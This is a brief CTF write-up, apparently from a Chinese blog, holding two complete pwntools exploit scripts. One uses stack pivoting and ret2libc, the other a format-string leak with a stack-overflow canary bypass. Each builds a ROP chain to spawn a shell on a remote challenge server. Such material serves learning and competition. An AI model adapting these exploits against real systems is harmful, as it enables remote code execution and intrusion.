Move

栈迁移+ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/python2
from pwn import *

io = remote('123.56.25.124', 22278)
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)

rc          = lambda n          : io.recv(n)
sa          = lambda a, b       : io.sendafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, b'\x00'))

pop_rdi = 0x0000000000401353
got = 0x0000000000404018
plt = 0x0000000000401080
main = 0x0000000000401264
pld = flat([
    pop_rdi,
    got,
    plt,
    main
])
sa('lets travel again!\n', pld)
sa('Input your setp number', p32(0x12345678))
pld = flat({
    0x38-8: 0x00000000004050A0 - 8,
    0x38: 0x00000000004012E0,
})
sa('TaiCooLa', pld)
libc_base = uu64(rc(6)) - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()

pld = flat([
    pop_rdi,
    binsh_addr,
    sys_addr,
    main
])
sa('lets travel again!\n', pld)
ia()

Pwthon

格式化字符串+栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/python2
from pwn import *

io = remote('123.56.9.101', 26410)
context.bits = 64
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)

ru          = lambda x          : io.recvuntil(x, drop = True)
sd          = lambda x          : io.send(x)
sl          = lambda x          : io.sendline(x)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()

def menu(choice):
    sla('> ', str(choice))

menu(0)
ru('Give you a gift')
app_base = int(ru('\n'), 16) - (0x7fd4ccdf88b0 - 0x7fd4ccdf2000)
sd('%llx,' * 0x1a)
sl('')
data = ru('\n')
libc_base = int(data[-13:-1], 16) - (0x7f54772a6cdd - 0x7f5477197000)
sys_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()

menu(0)
ru('Give you a gift')
data = ru('\n')
sd('%lx,' * 50)
sl('')
data = ru('>')
canary = int(data[-19:-3], 16)
pop_rdi = app_base + 0x0000000000003f8f
ret = app_base + 0x000000000000301a

sl('0')
ru('Give you a gift')
sd('a')
pld = flat({
    0x108: canary,
    0x110: ret,
    0x118: ret,
    0x120: ret,
    0x128: ret,
    0x130: pop_rdi,
    0x138: binsh_addr,
    0x140: sys_addr,
})
sd(pld)
ia()

一开始脑抽一直想着把cpython的so文件还原成python代码(一血又没了